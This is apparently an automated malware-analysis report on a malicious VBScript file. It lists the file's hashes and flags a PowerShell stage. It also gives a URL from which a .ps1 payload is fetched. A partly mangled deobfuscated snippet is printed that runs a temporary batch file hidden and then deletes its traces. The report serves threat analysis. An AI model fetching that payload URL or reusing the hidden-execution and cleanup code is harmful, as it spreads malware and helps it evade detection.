Malicious
Malicious

9e3c3c9565b48ecd3d264b0466ae37f0

VBScript
|
MD5: 9e3c3c9565b48ecd3d264b0466ae37f0
|
Size: 6.7 KB
|
text/vbscript

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
9e3c3c9565b48ecd3d264b0466ae37f0
Sha1
eea047f54af98a7e23078be20f0a5e11e53d584b
Sha256
715af322d6c32a2701fe28af1fb282ff9b02b549470d24b21fa1cd1e0eb0f003
Sha384
4da8c54010cab0d91dd261912d829b954798f1307b36cda95a551c81acbf858bab20bdb3280ddc0469d3d678e4586555
Sha512
5538dbbf368e81432e3d1757ced3786a88a170a97f2b0e8a260fd9b384db7b804b1b5248c26614d012cbab108249c64befced7600e6a9ff18d4e56f08bdca683
SSDeep
192:AtrxPgnLiVrxx27O/GbO/p7O/Ca/ZZpb22XO/J:qrxPgL4rypshYpK2XA
TLSH
FAD194176D124B3AE431C1B636B3E01EE91082938C1808D4789CC8B61FB9E7E96BC0FD
File Structure
9e3c3c9565b48ecd3d264b0466ae37f0
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
9e3c3c9565b48ecd3d264b0466ae37f0.deobfuscated.vbs
Malicious
[Command #0]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

https://pastas-2ey.pages.dev/kaleb.ps1
Deobfuscated PowerShell

& chr 34 & pspath & chr 34 batfile.writeline "exit" batfile.close set "batFile" "=" "Nothing" " --- Executa o BAT temporário --- tx.Run "cmd /c """ & tempBatFile & """", 0, True " aguarda "um" "pouco" "antes" "de" "limpar" wscript.sleep 3000 ' Limpa arquivos temporários On Error Resume Next If fso.FileExists(tempPsFile) Then fso.DeleteFile tempPsFile, True If fso.FileExists(tempBatFile) Then fso.DeleteFile tempBatFile, True On Error GoTo 0 ' ' --- Limpeza do lock no final --- If fso.FileExists(lockFile) Then On Error Resume Next fso.DeleteFile lockFile, True On Error GoTo 0 End If ' limpa "objetos" set "fso" "=" "Nothing" set "tx" "=" "Nothing"
9e3c3c9565b48ecd3d264b0466ae37f0 (6.7 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙